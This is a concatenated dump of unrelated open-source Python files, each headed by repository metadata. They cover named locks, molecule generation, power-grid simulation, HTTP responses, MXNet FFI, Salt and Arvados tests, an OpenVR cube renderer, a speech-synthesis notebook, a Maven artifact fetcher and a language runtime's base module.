self.locks[lock_name] = threading.Lock()
self.locks_lock.release()
self.locks[lock_name].acquire()
return
# release a lock by its name
def release(self, lock_name):
if lock_name not in self.locks.keys():
return
self.locks[lock_name].release()
return
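# A short usage sketch (not part of the original module): guard a critical section
# with a named lock.
if __name__ == '__main__':
    mgr = LockMgr()
    mgr.acquire('vnode-1')      # the named lock is created on first use
    try:
        pass                    # critical section protected by 'vnode-1'
    finally:
        mgr.release('vnode-1')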
|
aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py | yndu13/aliyun-openapi-python-sdk | 1,001 | 12728850 | <filename>aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py
__version__ = "1.1.19" |
python/src/converters/__init__.py | vvucetic/keyvi | 199 | 12728857 | <reponame>vvucetic/keyvi
from .pykeyvi_autowrap_conversion_providers import *
from autowrap.ConversionProvider import special_converters
def register_converters():
special_converters.append(MatchIteratorPairConverter())
|
openmmtools/data/benzene-toluene-implicit/generate-molecules.py | sroet/openmmtools | 135 | 12728859 | #!/usr/bin/env python
"""
Generate molecules for test system using OpenEye tools.
"""
molecules = { 'BEN' : 'benzene',
'TOL' : 'toluene' }
from openeye import oechem
from openeye import oeomega
from openeye import oeiupac
from openeye import oequacpac
# Create molecules.
for resname in molecules:
name = molecules[resname]
print(name)
# Create molecule from IUPAC name.
molecule = oechem.OEMol()
oeiupac.OEParseIUPACName(molecule, name)
molecule.SetTitle(name)
# Normalize molecule.
oechem.OEAddExplicitHydrogens(molecule)
oechem.OETriposAtomNames(molecule)
oechem.OEAssignAromaticFlags(molecule, oechem.OEAroModelOpenEye)
# Create configuration.
omega = oeomega.OEOmega()
omega.SetStrictStereo(True)
omega.SetIncludeInput(False)
omega(molecule)
# Create charges.
oequacpac.OEAssignPartialCharges(molecule, oequacpac.OECharges_AM1BCCSym)
# Write molecule.
filename = '%s.tripos.mol2' % name
print(filename)
ofs = oechem.oemolostream()
ofs.open(filename)
oechem.OEWriteMolecule(ofs, molecule)
ofs.close()
# Replace <0> with resname.
infile = open(filename, 'r')
lines = infile.readlines()
infile.close()
newlines = [line.replace('<0>', resname) for line in lines]
outfile = open(filename, 'w')
outfile.writelines(newlines)
outfile.close()
|
src/research/dynamic/dynamic_test.py | mzy2240/GridCal | 284 | 12728889 | from GridCal.Engine.calculation_engine import *
from GridCal.Engine.Simulations.Dynamics.dynamic_modules import *
grid = MultiCircuit()
# grid.load_file('lynn5buspv.xlsx')
grid.load_file('IEEE30.xlsx')
grid.compile()
circuit = grid.circuits[0]
options = PowerFlowOptions(SolverType.NR, verbose=False, robust=False, tolerance=1e-9)
power_flow = PowerFlow(grid, options)
power_flow.run()
dynamic_devices = circuit.get_generators()
bus_indices = [circuit.buses_dict[elm.bus] for elm in dynamic_devices]
res = dynamic_simulation(n=len(circuit.buses),
Vbus=power_flow.results.voltage,
Sbus=circuit.power_flow_input.Sbus,
Ybus=circuit.power_flow_input.Ybus,
Sbase=circuit.Sbase,
fBase=50,
t_sim=50,
h=0.001,
dynamic_devices=dynamic_devices,
bus_indices=bus_indices)
from matplotlib import pyplot as plt
plt.figure()
plt.plot(res.time, abs(res.voltage), linewidth=1)
plt.title('Generator voltages')
plt.figure()
plt.plot(res.time, abs(res.omegas), linewidth=1)
plt.title('Angular speeds')
plt.show()
|
src/titiler/core/titiler/core/resources/responses.py | obaid585/rastertile | 288 | 12728924 | <gh_stars>100-1000
"""Common response models."""
from typing import Any
import simplejson as json
from starlette import responses
class XMLResponse(responses.Response):
"""XML Response"""
media_type = "application/xml"
class JSONResponse(responses.JSONResponse):
"""Custom JSON Response."""
def render(self, content: Any) -> bytes:
"""Render JSON.
Same defaults as starlette.responses.JSONResponse.render but allow NaN to be replaced by null using simplejson
"""
return json.dumps(
content,
ensure_ascii=False,
allow_nan=False,
indent=None,
ignore_nan=True,
separators=(",", ":"),
).encode("utf-8")
class GeoJSONResponse(JSONResponse):
"""GeoJSON Response"""
media_type = "application/geo+json"
|
python/mxnet/_ffi/function.py | mchoi8739/incubator-mxnet | 211 | 12728934 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-import
"""
Function namespace.
Acknowledgement: This file originates from incubator-tvm
"""
import os
import sys
import ctypes
from ..base import _LIB, check_call
from .base import py_str, c_str
try:
if int(os.environ.get("MXNET_ENABLE_CYTHON", True)) == 0:
from ._ctypes.function import FunctionBase as _FunctionBase
# To set RETURN_SWITCH for OBJECT_HANDLE
from . import object
else:
from ._cy3.core import FunctionBase as _FunctionBase
except ImportError:
if int(os.environ.get("MXNET_ENFORCE_CYTHON", False)) != 0:
raise ImportError("Cython Module cannot be loaded but MXNET_ENFORCE_CYTHON=1")
from ._ctypes.function import FunctionBase as _FunctionBase
# To set RETURN_SWITCH for OBJECT_HANDLE
from . import object
FunctionHandle = ctypes.c_void_p
class Function(_FunctionBase):
"""The PackedFunc object used in TVM.
    Function plays a key role in bridging the frontend and backend in TVM.
    Function provides a type-erased interface; you can call a function with positional arguments.
    The compiled module returns Function.
    The TVM backend also registers and exposes its API as Functions.
    For example, the developer functions exposed in tvm.ir_pass are actually
    C++ functions that are registered as PackedFunc.
    The following is a list of common usage scenarios of tvm.Function.
- Automatic exposure of C++ API into python
- To call PackedFunc from python side
- To call python callbacks to inspect results in generated code
- Bring python hook into C++ backend
See Also
--------
tvm.register_func: How to register global function.
tvm.get_global_func: How to get global function.
"""
def get_global_func(name, allow_missing=False):
"""Get a global function by name
Parameters
----------
name : str
The name of the global function
allow_missing : bool
Whether allow missing function or raise an error.
Returns
-------
func : tvm.Function
The function to be returned, None if function is missing.
"""
handle = FunctionHandle()
check_call(_LIB.MXNetFuncGetGlobal(c_str(name), ctypes.byref(handle)))
if handle.value:
return Function(handle, False)
if allow_missing:
return None
raise ValueError("Cannot find global function %s" % name)
def list_global_func_names():
"""Get list of global functions registered.
Returns
-------
names : list
List of global functions names.
"""
plist = ctypes.POINTER(ctypes.c_char_p)()
size = ctypes.c_uint()
check_call(_LIB.MXNetFuncListGlobalNames(ctypes.byref(size),
ctypes.byref(plist)))
fnames = []
for i in range(size.value):
fnames.append(py_str(plist[i]))
return fnames
def _get_api(f):
flocal = f
flocal.is_global = True
return flocal
def _init_api(namespace, target_module_name=None):
"""Initialize api for a given module name
namespace : str
The namespace of the source registry
target_module_name : str
The target module name if different from namespace
"""
target_module_name = (
target_module_name if target_module_name else namespace)
if namespace.startswith("mxnet."):
_init_api_prefix(target_module_name, namespace[6:])
else:
_init_api_prefix(target_module_name, namespace)
def _init_api_prefix(module_name, prefix):
module = sys.modules[module_name]
for name in list_global_func_names():
if prefix == "api":
fname = name
if name.startswith("_"):
target_module = sys.modules["mxnet._api_internal"]
else:
target_module = module
else:
if not name.startswith(prefix):
continue
fname = name[len(prefix)+1:]
target_module = module
if fname.find(".") != -1:
continue
f = get_global_func(name)
ff = _get_api(f)
ff.__name__ = fname
ff.__doc__ = ("MXNet PackedFunc %s. " % fname)
setattr(target_module, ff.__name__, ff)
|
tests/pytests/functional/states/test_npm.py | markgras/salt | 9,425 | 12728956 | <gh_stars>1000+
import pytest
from salt.exceptions import CommandExecutionError
@pytest.fixture(scope="module", autouse=True)
def install_npm(sminion):
try:
sminion.functions.state.single("pkg.installed", name="npm")
# Just name the thing we're looking for
sminion.functions.npm # pylint: disable=pointless-statement
except (CommandExecutionError, AttributeError) as e:
pytest.skip("Unable to install npm - " + str(e))
@pytest.mark.slow_test
@pytest.mark.destructive_test
@pytest.mark.requires_network
def test_removed_installed_cycle(states, modules):
project_version = "[email protected]"
success = modules.npm.uninstall("pm2")
assert success, "Unable to uninstall pm2 in prep for tests"
ret = states.npm.installed(name=project_version)
assert ret.result is True, "Failed to states.npm.installed {} - {}".format(
project_version, ret.comment
)
ret = states.npm.removed(name=project_version)
assert ret.result is True, "Failed to states.npm.removed {} - {}".format(
project_version, ret.comment
)
|
src/openvr/color_cube_actor.py | risa2000/pyopenvr | 204 | 12728971 | #!/bin/env python
# file color_cube_actor.py
from textwrap import dedent
from OpenGL.GL import * # @UnusedWildImport # this comment squelches an IDE warning
from OpenGL.GL.shaders import compileShader, compileProgram
from openvr.glframework import shader_string
"""
Color cube for use in "hello world" openvr apps
"""
class ColorCubeActor(object):
"""
Draws a cube
2________ 3
/| /|
6/_|____7/ |
| |_____|_|
| /0 | /1
|/______|/
4 5
"""
def __init__(self):
self.shader = 0
self.vao = None
def init_gl(self):
vertex_shader = compileShader(
shader_string("""
// Adapted from @jherico's RiftDemo.py in pyovr
layout(location = 0) uniform mat4 Projection = mat4(1);
layout(location = 4) uniform mat4 ModelView = mat4(1);
layout(location = 8) uniform float Size = 0.3;
// Minimum Y value is zero, so cube sits on the floor in room scale
const vec3 UNIT_CUBE[8] = vec3[8](
vec3(-1.0, -0.0, -1.0), // 0: lower left rear
vec3(+1.0, -0.0, -1.0), // 1: lower right rear
vec3(-1.0, +2.0, -1.0), // 2: upper left rear
vec3(+1.0, +2.0, -1.0), // 3: upper right rear
vec3(-1.0, -0.0, +1.0), // 4: lower left front
vec3(+1.0, -0.0, +1.0), // 5: lower right front
vec3(-1.0, +2.0, +1.0), // 6: upper left front
vec3(+1.0, +2.0, +1.0) // 7: upper right front
);
const vec3 UNIT_CUBE_NORMALS[6] = vec3[6](
vec3(0.0, 0.0, -1.0),
vec3(0.0, 0.0, 1.0),
vec3(1.0, 0.0, 0.0),
vec3(-1.0, 0.0, 0.0),
vec3(0.0, 1.0, 0.0),
vec3(0.0, -1.0, 0.0)
);
const int CUBE_INDICES[36] = int[36](
0, 1, 2, 2, 1, 3, // front
4, 6, 5, 6, 5, 7, // back
0, 2, 4, 4, 2, 6, // left
1, 3, 5, 5, 3, 7, // right
2, 6, 3, 6, 3, 7, // top
0, 1, 4, 4, 1, 5 // bottom
);
out vec3 _color;
void main() {
_color = vec3(1.0, 0.0, 0.0);
int vertexIndex = CUBE_INDICES[gl_VertexID];
int normalIndex = gl_VertexID / 6;
_color = UNIT_CUBE_NORMALS[normalIndex];
if (any(lessThan(_color, vec3(0.0)))) {
_color = vec3(1.0) + _color;
}
gl_Position = Projection * ModelView * vec4(UNIT_CUBE[vertexIndex] * Size, 1.0);
}
"""),
GL_VERTEX_SHADER)
fragment_shader = compileShader(
shader_string("""
in vec3 _color;
out vec4 FragColor;
void main() {
FragColor = vec4(_color, 1.0);
}
"""),
GL_FRAGMENT_SHADER)
self.shader = compileProgram(vertex_shader, fragment_shader)
#
self.vao = glGenVertexArrays(1)
glBindVertexArray(self.vao)
glEnable(GL_DEPTH_TEST)
def display_gl(self, modelview, projection):
glUseProgram(self.shader)
glUniformMatrix4fv(0, 1, False, projection)
glUniformMatrix4fv(4, 1, False, modelview)
glBindVertexArray(self.vao)
glDrawArrays(GL_TRIANGLES, 0, 36)
def dispose_gl(self):
glDeleteProgram(self.shader)
self.shader = 0
if self.vao:
glDeleteVertexArrays(1, (self.vao,))
self.vao = 0
|
scripts/tacotron_save_spec.py | gioannides/OpenSeq2Seq | 1,459 | 12728989 | %matplotlib inline
# Replace the first box of Interactive_Infer_example.ipynb with this
import IPython
import librosa
import numpy as np
import scipy.io.wavfile as wave
import tensorflow as tf
import matplotlib.pyplot as plt
from open_seq2seq.utils.utils import deco_print, get_base_config, check_logdir,\
create_logdir, create_model, get_interactive_infer_results
from open_seq2seq.models.text2speech import save_audio
args_T2S = ["--config_file=Infer_T2S/config.py",
"--mode=interactive_infer",
"--logdir=Infer_T2S/",
"--batch_size_per_gpu=1",
]
# A simpler version of what run.py does. It returns the created model and its saved checkpoint
def get_model(args, scope):
with tf.variable_scope(scope):
args, base_config, base_model, config_module = get_base_config(args)
checkpoint = check_logdir(args, base_config)
model = create_model(args, base_config, config_module, base_model, None)
return model, checkpoint
model_T2S, checkpoint_T2S = get_model(args_T2S, "T2S")
# Create the session and load the checkpoints
sess_config = tf.ConfigProto(allow_soft_placement=True)
sess_config.gpu_options.allow_growth = True
sess = tf.InteractiveSession(config=sess_config)
vars_T2S = {}
for v in tf.get_collection(tf.GraphKeys.VARIABLES):
if "T2S" in v.name:
vars_T2S["/".join(v.op.name.split("/")[1:])] = v
saver_T2S = tf.train.Saver(vars_T2S)
saver_T2S.restore(sess, checkpoint_T2S)
# line = "I was trained using Nvidia's Open Sequence to Sequence framework."
# Define the inference function
n_fft = model_T2S.get_data_layer().n_fft
sampling_rate = model_T2S.get_data_layer().sampling_rate
def infer(line):
print("Input English")
print(line)
# Generate speech
results = get_interactive_infer_results(model_T2S, sess, model_in=[line])
audio_length = results[1][4][0]
if model_T2S.get_data_layer()._both:
prediction = results[1][5][0]
else:
prediction = results[1][1][0]
prediction = prediction[:audio_length-1,:]
mag_prediction = model_T2S.get_data_layer().get_magnitude_spec(prediction)
mag_prediction_squared = np.clip(mag_prediction, a_min=0, a_max=255)
mag_prediction_squared = mag_prediction_squared**1.5
mag_prediction_squared = np.square(mag_prediction_squared)
mel_basis = librosa.filters.mel(sr=22050, n_fft=1024, n_mels=80, htk=True, norm=None)
mel = np.dot(mel_basis, mag_prediction_squared.T)
mel = np.log(np.clip(mel, a_min=1e-5, a_max=None))
np.save("spec2", mel)
plt.imshow(mel)
plt.gca().invert_yaxis()
plt.show()
wav = save_audio(mag_prediction, "unused", "unused", sampling_rate=sampling_rate, save_format="np.array", n_fft=n_fft)
audio = IPython.display.Audio(wav, rate=sampling_rate)
print("Generated Audio")
IPython.display.display(audio)
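# Example invocation (the sentence is illustrative, mirroring the commented-out line above):
# infer("I was trained using Nvidia's Open Sequence to Sequence framework.")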
|
sdk/cwl/tests/test_util.py | rpatil524/arvados | 222 | 12729006 | <reponame>rpatil524/arvados
# Copyright (C) The Arvados Authors. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
from builtins import bytes
import unittest
import mock
import datetime
import httplib2
from arvados_cwl.util import *
from arvados.errors import ApiError
class MockDateTime(datetime.datetime):
@classmethod
def utcnow(cls):
return datetime.datetime(2018, 1, 1, 0, 0, 0, 0)
datetime.datetime = MockDateTime
class TestUtil(unittest.TestCase):
def test_get_intermediate_collection_info(self):
name = "one"
current_container = {"uuid": "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}
intermediate_output_ttl = 120
info = get_intermediate_collection_info(name, current_container, intermediate_output_ttl)
self.assertEqual(info["name"], "Intermediate collection for step one")
self.assertEqual(info["trash_at"], datetime.datetime(2018, 1, 1, 0, 2, 0, 0))
self.assertEqual(info["properties"], {"type" : "intermediate", "container" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"})
def test_get_current_container_success(self):
api = mock.MagicMock()
api.containers().current().execute.return_value = {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"}
current_container = get_current_container(api)
self.assertEqual(current_container, {"uuid" : "zzzzz-8i9sb-zzzzzzzzzzzzzzz"})
def test_get_current_container_error(self):
api = mock.MagicMock()
api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 300}), bytes(b""))
logger = mock.MagicMock()
with self.assertRaises(ApiError):
get_current_container(api, num_retries=0, logger=logger)
def test_get_current_container_404_error(self):
api = mock.MagicMock()
api.containers().current().execute.side_effect = ApiError(httplib2.Response({"status": 404}), bytes(b""))
logger = mock.MagicMock()
current_container = get_current_container(api, num_retries=0, logger=logger)
self.assertEqual(current_container, None) |
atomic_reactor/plugins/fetch_maven_artifacts.py | qixiang/atomic-reactor | 113 | 12729008 | <filename>atomic_reactor/plugins/fetch_maven_artifacts.py
"""
Copyright (c) 2017-2022 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
import dataclasses
import functools
import hashlib
import os
from pathlib import Path
from typing import Iterator, List, Sequence, Dict
import koji
from atomic_reactor import util
from atomic_reactor.constants import (PLUGIN_FETCH_MAVEN_KEY,
REPO_FETCH_ARTIFACTS_URL,
REPO_FETCH_ARTIFACTS_KOJI)
from atomic_reactor.config import get_koji_session
from atomic_reactor.dirs import BuildDir
from atomic_reactor.download import download_url
from atomic_reactor.plugin import Plugin
from atomic_reactor.utils.koji import NvrRequest
from atomic_reactor.utils.pnc import PNCUtil
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
@dataclasses.dataclass(frozen=True)
class DownloadRequest:
url: str
dest: str
checksums: Dict[str, str]
class FetchMavenArtifactsPlugin(Plugin):
key = PLUGIN_FETCH_MAVEN_KEY
is_allowed_to_fail = False
DOWNLOAD_DIR = 'artifacts'
def __init__(self, workflow):
"""
:param workflow: DockerBuildWorkflow instance
"""
super(FetchMavenArtifactsPlugin, self).__init__(workflow)
self.path_info = self.workflow.conf.koji_path_info
all_allowed_domains = self.workflow.conf.artifacts_allowed_domains
self.allowed_domains = set(domain.lower() for domain in all_allowed_domains or [])
self.session = None
self._pnc_util = None
self.no_source_artifacts = []
self.source_url_to_artifacts = {}
@property
def pnc_util(self):
if not self._pnc_util:
pnc_map = self.workflow.conf.pnc
if not pnc_map:
raise RuntimeError('No PNC configuration found in reactor config map')
self._pnc_util = PNCUtil(pnc_map)
return self._pnc_util
def process_by_nvr(self, nvr_requests: List[NvrRequest]):
# components are metadata about nvr artifacts that we're going to fetch
components = []
download_queue = []
errors = []
for nvr_request in nvr_requests:
build_info = self.session.getBuild(nvr_request.nvr)
if not build_info:
errors.append('Build {} not found.'.format(nvr_request.nvr))
continue
maven_build_path = self.path_info.mavenbuild(build_info)
build_archives = self.session.listArchives(buildID=build_info['id'],
type='maven')
build_archives = nvr_request.match_all(build_archives)
for build_archive in build_archives:
maven_file_path = self.path_info.mavenfile(build_archive)
# NOTE: Don't use urljoin here because maven_build_path does
# not contain a trailing slash, which causes the last dir to
# be dropped.
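                # For example (paths are illustrative):
                #   urljoin('https://koji/packages/n/v/r/maven', 'g/a/v/a.jar')
                # returns 'https://koji/packages/n/v/r/g/a/v/a.jar', silently replacing
                # the trailing 'maven' directory.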
url = maven_build_path + '/' + maven_file_path
checksum_type = koji.CHECKSUM_TYPES[build_archive['checksum_type']]
checksums = {checksum_type: build_archive['checksum']}
download_queue.append(DownloadRequest(url, maven_file_path, checksums))
components.append({
'type': 'kojifile',
'filename': build_archive['filename'],
'filesize': build_archive['size'],
'checksum': build_archive['checksum'],
'checksum_type': checksum_type,
'nvr': nvr_request.nvr,
'archive_id': build_archive['id'],
})
unmatched_archive_requests = nvr_request.unmatched()
if unmatched_archive_requests:
errors.append('NVR request for "{}", failed to find archives for: "{}"'
.format(nvr_request.nvr, unmatched_archive_requests))
continue
if errors:
raise ValueError('Errors found while processing {}: {}'
.format(REPO_FETCH_ARTIFACTS_KOJI, ', '.join(errors)))
return components, download_queue
def process_by_url(self, url_requests):
download_queue = []
        # We capture all source artifacts of the URL artifacts in source_download_queue.
        # Later, the maven_url_sources_metadata plugin processes this queue to generate
        # remote source files, which the source container build later uses to fetch the
        # sources of the URL artifacts.
        # We have to do this post-build to avoid having source artifacts in build_dir
        # during the binary build.
source_download_queue = []
errors = []
for url_request in url_requests:
url = url_request['url']
if self.allowed_domains:
parsed_file_url = urlparse(url.lower())
file_url = parsed_file_url.netloc + parsed_file_url.path
if not any(file_url.startswith(prefix) for prefix in self.allowed_domains):
errors.append('File URL {} is not in list of allowed domains: {}'
.format(file_url, self.allowed_domains))
continue
checksums = {algo: url_request[algo] for algo in hashlib.algorithms_guaranteed
if algo in url_request}
target = url_request.get('target', url.rsplit('/', 1)[-1])
download_queue.append(DownloadRequest(url, target, checksums))
artifact = {
'url': url_request['url'],
'checksums': checksums,
'filename': os.path.basename(url_request['url'])
}
if 'source-url' not in url_request:
self.no_source_artifacts.append(artifact)
msg = f"No source-url found for {url_request['url']}.\n"
self.log.warning(msg)
msg += 'fetch-artifacts-url without source-url is deprecated\n'
msg += 'to fix this please provide the source-url according to ' \
'https://osbs.readthedocs.io/en/latest/users.html#fetch-artifacts-url-yaml'
self.log.user_warning(msg)
continue
source_url = url_request['source-url']
checksums = {algo: url_request[('source-' + algo)] for algo in
hashlib.algorithms_guaranteed
if ('source-' + algo) in url_request}
if source_url not in self.source_url_to_artifacts:
self.source_url_to_artifacts[source_url] = [artifact]
# source_url will mostly be gerrit URLs that don't have filename
# in the URL itself, so we'll have to get filename from URL response
target = os.path.basename(source_url)
source_download_queue.append(dataclasses.asdict(DownloadRequest(source_url, target,
checksums)))
else:
self.source_url_to_artifacts[source_url].append(artifact)
if errors:
raise ValueError('Errors found while processing {}: {}'
.format(REPO_FETCH_ARTIFACTS_URL, ', '.join(errors)))
return download_queue, source_download_queue
def process_pnc_requests(self, pnc_requests):
download_queue = []
artifact_ids = []
builds = pnc_requests.get('builds', [])
if builds:
pnc_build_metadata = {'builds': []}
else:
pnc_build_metadata = {}
for build in builds:
pnc_build_metadata['builds'].append({'id': build['build_id']})
for artifact in build['artifacts']:
artifact_ids.append(artifact['id'])
url, checksums = self.pnc_util.get_artifact(artifact['id'])
download_queue.append(DownloadRequest(url, artifact['target'], checksums))
return artifact_ids, download_queue, pnc_build_metadata
def download_files(
self, downloads: Sequence[DownloadRequest], build_dir: BuildDir
) -> Iterator[Path]:
"""Download maven artifacts to a build dir."""
artifacts_path = build_dir.path / self.DOWNLOAD_DIR
koji_config = self.workflow.conf.koji
insecure = koji_config.get('insecure_download', False)
self.log.debug('%d files to download', len(downloads))
session = util.get_retrying_requests_session()
for index, download in enumerate(downloads):
dest_path = artifacts_path / download.dest
dest_dir = dest_path.parent
dest_filename = dest_path.name
if not dest_dir.exists():
dest_dir.mkdir(parents=True)
self.log.debug('%d/%d downloading %s', index + 1, len(downloads),
download.url)
download_url(url=download.url, dest_dir=dest_dir, insecure=insecure, session=session,
dest_filename=dest_filename, expected_checksums=download.checksums)
yield dest_path
def run(self):
self.session = get_koji_session(self.workflow.conf)
nvr_requests = [
NvrRequest(**nvr_request) for nvr_request in
util.read_fetch_artifacts_koji(self.workflow) or []
]
pnc_requests = util.read_fetch_artifacts_pnc(self.workflow) or {}
url_requests = util.read_fetch_artifacts_url(self.workflow) or []
components, nvr_download_queue = self.process_by_nvr(nvr_requests)
url_download_queue, source_download_queue = self.process_by_url(url_requests)
pnc_artifact_ids, pnc_download_queue, pnc_build_metadata = self.process_pnc_requests(
pnc_requests)
download_queue = pnc_download_queue + nvr_download_queue + url_download_queue
download_to_build_dir = functools.partial(self.download_files, download_queue)
self.workflow.build_dir.for_all_platforms_copy(download_to_build_dir)
return {
'components': components,
'download_queue': [dataclasses.asdict(download) for download in download_queue],
'no_source': self.no_source_artifacts,
'pnc_artifact_ids': pnc_artifact_ids,
'pnc_build_metadata': pnc_build_metadata,
'source_download_queue': source_download_queue,
'source_url_to_artifacts': self.source_url_to_artifacts,
}
|
models/res_users.py | wdw139130/wechat-mall | 108 | 12729102 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from odoo import models, fields, api
class ResUsers(models.Model):
_inherit = 'res.users'
sub_domain = fields.Char('子域名', help='用于小程序接口的子域名。', index=True)
@api.model
def create(self, vals):
from uuid import uuid1
vals['sub_domain'] = uuid1().get_hex()
return super(ResUsers, self).create(vals)
|
test.py | wu546300070/weiboanalysis | 685 | 12729133 | <gh_stars>100-1000
import re
word="jofwjoifA级哦啊接我金佛安fewfae慰剂serge"
p = re.compile(r'\w', re.A)  # re.L (LOCALE) cannot be used with str patterns in Python 3; re.A keeps \w ASCII-only
result = p.sub("", word)
print(result) |
easytransfer/layers/encoder_decoder.py | johnson7788/EasyTransfer | 806 | 12729136 | <reponame>johnson7788/EasyTransfer
# coding=utf-8
# Copyright (c) 2019 Alibaba PAI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tensorflow.python.layers.base import Layer
from .activations import gelu_new
from .attention import Attention, CrossAttention
from .core import dense_dropoutput_layernorm, Dense
from .utils import get_initializer
class EncoderBlock(Layer):
def __init__(self, config, **kwargs):
super(EncoderBlock, self).__init__(**kwargs)
self.attention = Attention(config, name="attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.bert_output = dense_dropoutput_layernorm(config, name="output")
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.bert_output([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class DecoderBlock(Layer):
def __init__(self, config, **kwargs):
super(DecoderBlock, self).__init__(**kwargs)
self.attention = Attention(config, name="decoder_attention")
self.cross_attention = CrossAttention(config, name="decoder_cross_attention")
# Use gelu_new, then match results
self.intermediate = Dense(
units=config.intermediate_size,
activation=gelu_new,
kernel_initializer=get_initializer(config.initializer_range),
name="intermediate/dense")
self.output_1 = dense_dropoutput_layernorm(config, name="output_1")
self.output_2 = dense_dropoutput_layernorm(config, name="output_2")
def call(self, inputs, training=False):
hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs
attention_output = self.attention([hidden_states, attention_mask], training=training)
cross_attention_output = self.cross_attention([hidden_states, encoder_hidden_states,
encoder_attention_mask])
attention_output = self.output_1([attention_output, cross_attention_output], training=training)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output_2([intermediate_output, attention_output], training=training)
return layer_output, attention_output
class Encoder(Layer):
def __init__(self, config, **kwargs):
super(Encoder, self).__init__(**kwargs)
self.layer = [EncoderBlock(config, name="layer_{}".format(i)) for i in range(config.num_hidden_layers)]
def call(self, inputs, training=False):
hidden_states, attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
for i, layer_module in enumerate(self.layer):
layer_output, att_output = layer_module([hidden_states, attention_mask], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output,)
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
class Decoder(Layer):
def __init__(self, config, **kwargs):
super(Decoder, self).__init__(**kwargs)
self.layer = [DecoderBlock(config, name="decoder_layer_{}".format(i)) for i in range(config.num_hidden_layers)]
def call(self, inputs, training=False):
hidden_states, encoder_hidden_states, attention_mask, encoder_attention_mask = inputs
all_hidden_states = ()
all_att_outputs = ()
for i, layer_module in enumerate(self.layer):
layer_output, att_output = layer_module([hidden_states,
encoder_hidden_states,
attention_mask,
encoder_attention_mask
], training=training)
hidden_states = layer_output
all_hidden_states = all_hidden_states + (hidden_states,)
all_att_outputs = all_att_outputs + (att_output,)
final_outputs = []
for hidden_states in all_hidden_states:
final_outputs.append(hidden_states)
return final_outputs, all_att_outputs
|
runtime/base.py | cheery/lever | 136 | 12729159 | <reponame>cheery/lever<gh_stars>100-1000
from async_io import Event, Queue
from evaluator.loader import from_object
from evaluator.sourcemaps import TraceEntry
from rpython.rlib.objectmodel import specialize, always_inline
from rpython.rlib.rstring import UnicodeBuilder
from rpython.rtyper.lltypesystem import rffi
from space.customobject import CustomObject_instantiate
from space import *
import core
import naming
import os
import pathobj
#import stdlib
import sys
import time
import uv_handle
import uv_stream
import uv_timer
import uv_util
import vectormath
import vector
# The base environment
module = Module(u'base', {
u'builtin': Builtin.interface,
u'greenlet': core.Greenlet.interface,
u'interface': Interface.interface,
u'Id': Id.interface,
u'dict': Dict.interface,
u'Module': Module.interface,
u'module': Module.interface, # TODO: deprecate and then remove
u'object': Object.interface,
u'list': List.interface,
u'multimethod': Multimethod.interface,
u'float': Float.interface,
u'float_repr': FloatRepr.interface,
u'int': Integer.interface,
u'bool': Boolean.interface,
u'str': String.interface,
u'null': null,
u'true': true,
u'false': false,
u'path': pathobj.Path.interface,
u'property': Property.interface,
u'Uint8Data': Uint8Data.interface,
u'Uint8Array': Uint8Array.interface,
u'Uint8Slice': Uint8Slice.interface,
u'Uint8Builder': Uint8Builder.interface,
u'Utf8Decoder': Utf8Decoder.interface,
u'StringBuilder': StringBuilder_.interface,
u'schedule': Builtin(core.schedule, u'schedule'),
u'set': Set.interface,
u'slice': Slice.interface,
u'DocRef': naming.DocRef.interface,
u'Event': Event.interface,
u'Queue': Queue.interface,
u'Timer': uv_timer.Timer.interface,
u'Handle': uv_handle.Handle.interface,
u'Stream': uv_stream.Stream.interface,
u'TTY': uv_stream.TTY.interface,
u'Pipe': uv_stream.Pipe.interface,
# The new vector interface, lets see how it fares.
u'Numeric': vector.Numeric.interface,
}, frozen=True)
@Module.instantiator
@signature(String, Module, optional=1)
def module_instantiate(name, extends):
return Module(name.string, {}, extends)
# we may later want to do the same for the stuff you see above.
for error in all_errors:
module.setattr_force(error.interface.name, error.interface)
for _, error in uv_util.errors:
module.setattr_force(error.interface.name, error.interface)
for name, value in operators.by_symbol.iteritems():
module.setattr_force(name, value)
for name, value in vectormath.by_symbol.iteritems():
module.setattr_force(name, value)
def builtin(fn):
name = fn.__name__.rstrip('_').decode('utf-8')
module.setattr_force(name, Builtin(fn, name))
return fn
@builtin
@signature(Object, Float, optional=1)
